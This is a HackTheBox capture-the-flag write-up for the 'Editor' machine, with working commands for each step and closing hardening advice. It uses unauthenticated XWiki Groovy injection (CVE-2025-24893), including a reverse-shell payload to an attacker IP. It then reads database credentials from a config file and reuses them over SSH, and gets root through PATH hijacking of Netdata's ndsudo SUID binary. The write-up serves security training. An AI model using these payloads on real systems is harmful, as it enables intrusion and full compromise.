Machine IP: 10.10.11.80 Machine Name: Editor Difficulty: Easy Operating System: Linux (Ubuntu 22.04.5 LTS)
---
# Table of Contents
3. User Flag
5. Root Flag
---
# Reconnaissance
# Port Scanning
First, let's discover open ports using nmap:
nmap -sC -sV -p- 10.10.11.80 -oN editor_nmap.txt
Results:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
8080/tcp open http Jetty 10.0.20
# Web Enumeration
# Port 80 (Nginx)
curl -I http://10.10.11.80
The website appears to be a basic landing page with minimal functionality.
# Port 8080 (XWiki)
curl -I http://10.10.11.80:8080
Discovery: XWiki application running on Jetty 10.0.20
# Visit the application
firefox http://10.10.11.80:8080/xwiki/
The application reveals:
- **XWiki Version:** 15.10.11
- **Server:** Jetty 10.0.20
---
# Initial Access
# Vulnerability Discovery
XWiki version 15.10.11 is vulnerable to CVE-2025-24893 - Remote Code Execution via the SolrSearch RSS feed endpoint.
Vulnerability Details:
- The SolrSearch endpoint allows Groovy script injection
- Authentication is not required
- Code execution occurs as the `xwiki` user
# Exploitation
# Step 1: Test RCE with Command Execution
# URL-encoded payload to execute 'id' command
curl -s "http://10.10.11.80:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7d%27id%27.execute%28%29.text%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d"
Payload Breakdown:
- `}}}{{async async=false}}{{groovy}}'id'.execute().text{{/groovy}}{{/async}}`
- This breaks out of the search context and executes Groovy code
# Step 2: Establish Reverse Shell
# On attacker machine - start listener
nc -lvnp 4444
# Send reverse shell payload
curl -s "http://10.10.11.80:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7d%27bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/10.10.14.97/4444%200%3E%261%22%27.execute%28%29%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d"
Decoded Payload:
}}}{{async async=false}}{{groovy}}'bash -c "bash -i >& /dev/tcp/10.10.14.97/4444 0>&1"'.execute(){{/groovy}}{{/async}}
✅ Shell obtained as xwiki user
---
# User Flag
# Credential Discovery
After gaining shell access as xwiki, we need to escalate to a proper user account.
# Step 1: Explore XWiki Configuration
# Navigate to XWiki directory
cd /usr/lib/xwiki-jetty/webapps/xwiki/WEB-INF/
# Find database configuration
cat hibernate.cfg.xml
Database Credentials Found:
- **Username:** `xwiki`
- **Password:** `theEd1t0rTeam99`
# Step 2: Enumerate System Users
cat /etc/passwd | grep -E "/bin/bash|/bin/sh"
Users with shell access:
- `root`
- `oliver`
# Step 3: SSH as Oliver
ssh oliver@10.10.11.80
Password: theEd1t0rTeam99
✅ Successful login as oliver
# Step 4: Retrieve User Flag
cat ~/user.txt
User Flag: 76c5e3bef48029cc832ae0e0129f488b
---
# Privilege Escalation
# Enumeration as Oliver
# Check user groups
id
Output:
uid=1000(oliver) gid=1000(oliver) groups=1000(oliver),999(netdata)
🔑 Key Discovery: Oliver is a member of the netdata group!
# Netdata Privilege Escalation
# Step 1: Find SUID Binaries
find / -perm -4000 2>/dev/null
Interesting findings:
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
/opt/netdata/usr/libexec/netdata/plugins.d/cgroup-network
/opt/netdata/usr/libexec/netdata/plugins.d/network-viewer.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/local-listeners
/opt/netdata/usr/libexec/netdata/plugins.d/ioping
/opt/netdata/usr/libexec/netdata/plugins.d/nfacct.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/ebpf.plugin
# Check permissions
ls -la /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
Output:
-rwsr-x--- 1 root netdata 200576 Apr 1 2024 ndsudo
# Step 2: Analyze ndsudo Binary
# Test ndsudo
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
Output:
at least 2 parameters are needed, but 1 were given.
# Test with random command
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo /bin/bash
Output:
command not recognized: /bin/bash
Analysis:
- `ndsudo` is a SUID binary owned by root
- It only allows specific whitelisted commands
- We need to discover which commands are allowed
# Step 3: Identify Allowed Commands
Through research and testing, we discover that nvme-list is an allowed command in the ndsudo whitelist. This is related to NVMe storage device management.
# Exploitation via PATH Hijacking
The attack leverages:
1. ndsudo runs as root (SUID bit)
2. nvme-list is an allowed command
3. ndsudo searches for commands in the user's PATH
4. We can create a malicious binary and manipulate PATH
# Step 4: Create Malicious Binary
On your local Kali machine:
# Create exploit code
nano poc.c
#include
int main() {
setuid(0); // Set user ID to root
setgid(0); // Set group ID to root
execl("/bin/bash", "bash", NULL); // Spawn bash shell
return 0;
}
# Compile the exploit
gcc poc.c -o nvme
# Transfer to target
scp nvme oliver@10.10.11.80:/tmp/
# Step 5: Execute Privilege Escalation
On the target machine as oliver:
# Make binary executable
chmod +x /tmp/nvme
# Add /tmp to beginning of PATH
export PATH=/tmp:$PATH
# Execute ndsudo with nvme-list command
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
What happens:
1. ndsudo runs with root privileges (SUID)
2. It searches for nvme-list in PATH
3. Finds /tmp/nvme first (PATH hijacking)
4. Executes our malicious binary as root
5. Our binary sets UID/GID to 0 and spawns bash
✅ Root shell obtained!
# Verify root access
id
Output:
uid=0(root) gid=0(root) groups=0(root),999(netdata)
---
# Root Flag
cat /root/root.txt
Root Flag: e169e7b0a9ddf440e288947242723354
---
# Key Takeaways
# Vulnerabilities Exploited
1. CVE-2025-24893 - XWiki Groovy RCE via SolrSearch
- Unauthenticated remote code execution
- Improper input validation in RSS feed generation
2. Weak Credential Reuse
- Database password reused for SSH authentication
- Sensitive credentials in plaintext configuration files
3. PATH Hijacking via SUID Binary
- `ndsudo` binary with insecure command execution
- Whitelisted commands without absolute paths
- User-controlled PATH environment variable
# Security Recommendations
1. Application Security:
- Keep XWiki updated to the latest patched version
- Disable unnecessary features like Groovy script execution
- Implement proper input validation and sanitization
2. Credential Management:
- Use unique, strong passwords for each service
- Store sensitive credentials in secure vaults (e.g., HashiCorp Vault)
- Encrypt configuration files containing credentials
- Implement proper file permissions on configuration files
3. Privilege Escalation Prevention:
- Audit SUID binaries regularly
- Use absolute paths in SUID programs
- Implement proper command whitelisting with full paths
- Minimize group memberships and follow principle of least privilege
- Consider using security frameworks like AppArmor or SELinux
4. System Hardening:
- Regular security updates and patch management
- Remove unnecessary SUID binaries
- Implement proper logging and monitoring
- Use security scanning tools to identify misconfigurations
# Attack Chain Summary
1. XWiki RCE (CVE-2025-24893)
↓
2. Shell as 'xwiki' user
↓
3. Credential Discovery (hibernate.cfg.xml)
↓
4. SSH as 'oliver' (password: theEd1t0rTeam99)
↓
5. Group Membership Discovery (netdata group)
↓
6. SUID Binary Analysis (ndsudo)
↓
7. PATH Hijacking with malicious binary
↓
8. Root Access!
---
# Tools Used
- `nmap` - Network reconnaissance
- `curl` - HTTP requests and exploitation
- `netcat` - Reverse shell listener
- `gcc` - Compile exploit
- `scp` - File transfer
- `strings` - Binary analysis
---
# References
- [XWiki CVE-2025-24893](https://nvd.nist.gov/vuln/detail/CVE-2025-24893)
- [Netdata SUID Vulnerabilities](https://github.com/netdata/netdata/security)
- [PATH Hijacking Techniques](https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/)
- [GTFOBins - SUID Exploitation](https://gtfobins.github.io/)
---
Author: [Mrx0rd] Date: October 25, 2025 Platform: HackTheBox Machine: Editor
---
_Disclaimer: This writeup is for educational purposes only. Always obtain proper authorization before testing security vulnerabilities._
